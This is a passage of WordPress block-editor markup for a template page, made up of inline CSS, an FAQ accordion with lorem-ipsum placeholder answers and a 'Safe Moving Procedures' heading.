976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-627304db-e6fd-4a57-93f7-a54b4780da61\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"34ee5663\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-34ee5663 skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-34ee5663 {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"efde8242\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-efde8242 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"43a5459d\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-43a5459d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e85130f1\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e85130f1 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"eb7de836\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-eb7de836 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"7efd7e06-15e9-4409-bd57-879837f4059f\"} -->\n<style type=\"text/css\"> .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7efd7e06-15e9-4409-bd57-879837f4059f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"b3881bfe-ff5b-4775-a6c8-e6734143f906\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-b3881bfe-ff5b-4775-a6c8-e6734143f906 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f9f368f3-3d60-4546-bb21-46a4d6d60415\"} -->\n<style type=\"text/css\"> .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f9f368f3-3d60-4546-bb21-46a4d6d60415 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"6c7f2244-b638-4062-a64f-a98f96e558ed\"} -->\n<style type=\"text/css\"> .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6c7f2244-b638-4062-a64f-a98f96e558ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"f9f78eae-449c-455e-8fdd-a5882512983b\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-f9f78eae-449c-455e-8fdd-a5882512983b\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column 